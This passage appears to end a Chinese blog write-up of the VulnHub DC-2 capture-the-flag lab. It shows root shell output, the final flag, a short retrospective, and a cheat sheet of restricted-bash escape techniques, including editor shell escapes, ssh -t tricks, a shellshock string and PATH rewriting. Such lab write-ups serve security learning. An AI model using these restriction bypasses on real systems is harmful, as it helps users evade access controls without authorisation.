    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:00:39:e2 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.124/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe00:39e2/64 scope link 
       valid_lft forever preferred_lft forever
# uname -a
Linux DC-2 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux

确定是目标靶机,最后拿个 flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# cd /root
# ls
final-flag.txt
# cat final-flag.txt
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \|  _ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

总结复盘

这台靶机因为有提示,所以打起来没那么难,比如关于自己收集字典进行爆破,如果没有提示的话可能会卡很久,或者想办法用 wordpress 比较新的漏洞打进去。再就是 rbash 实际上是第一次遇到,虽然不难,但是处理起来依然消磨了不少时间,此外关于用户名和密码的重用,自己的敏感度还是不够高,关于渗透优先级的构建还是缺乏自己的思路。除此之外,这台靶机我尝试了很多内核提权的方法都没有成功

补充

rbash 绕过

在一个 rbash 的 shell 中,我们最开始要做的是对可用命令进行尝试,确定哪些命令是可用的,哪些命令是被限制的,这样我们才能更方便地绕过 rbash,接下来是一些绕过方法的总结,参考的文章会放在最后

环境侦察

  • 查看哪些命令可用
  • 查看操作符 >, >>, |
  • 查看可用的编程语言环境
  • sudo -l 查看可用 root 权限运行的命令
  • 查看 SUID 的命令或文件
  • echo $SHELL 确定 bash 环境
  • echo $PATH 查看环境变量

常见的 exploit

  • /bin/bash or /bin/sh
  • cp /bin/bash ./ or cp /bin/sh
  • ftp, gdb, less, vim 可用 !/bin/bash or /bin/sh
  • 还有一些可用在 gtfobins 中查看如何通过命令实现新启bash
  • 编程语言新启 bash
  • ssh 手法
    • ssh username@IP - t "/bin/sh" or "/bin/bash"
    • ssh username@IP -t "bash --noprofile"
    • ssh username@IP -t "() { :; }; /bin/bash" (shellshock)
    • ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (SUID)
    • pico -s "/bin/bash" then you can write /bin/bash and then CTRL + T
  • 直接修改环境变量 export PATH=$PATH:/bin/:/usr/bin:$PATH
  • 有时候 !sh 也有效果
knowledge_database > vulnhub
DC-2 靶机
https://i3eg1nner.github.io/2023/07/4537b1f7b404.html
作者
I3eg1nner
发布于
2023年7月10日
许可协议